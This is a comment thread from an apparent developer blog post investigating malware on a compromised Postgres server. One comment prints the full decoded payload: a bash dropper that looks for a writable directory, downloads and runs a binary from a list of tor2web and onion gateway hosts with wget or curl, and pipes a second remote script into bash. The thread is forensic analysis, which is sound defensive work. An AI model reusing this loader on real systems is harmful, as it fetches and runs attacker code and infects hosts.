Discussion on: Investigation into Postgres malware (hack?)

View post

Daniel Waller (he/him) • Mar 20 '20 • Edited

Hey!
Have you looked at the base64 encoded payload at all?

The long string that is being echoed is piped into base64 -d which decodes the base64 and the result is piped into bash for execution.

The decoded payload that is piped into bash is the following script (click here if gist doesn't load):

To correctly assess your situation and the impact this might have had on your systems and users you should definitely take a look to see what effects on your server and data this script might have had.
A very nice tool for this kind of forensic work is GCHQs CyberChef. It has lot's of functions for encoding and decoding different formats.

sanchitsharma • Mar 20 '20

Thanks Daniel. Don't know why I missed the piping into base64 -d command. Never had seen that command so my brain missed it :D. This has become more interesting. Am looking into what is this script doing

Daniel Waller (he/him) • Mar 20 '20 • Edited

Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D

Valts Liepiņš • Mar 20 '20

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=tencentxjy5kpccv

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi

sanchitsharma • Mar 21 '20

Thanks Valts, I have added a bit commented (whatever I could understand) version to post itself. Please comment if I might have done anything wrong there.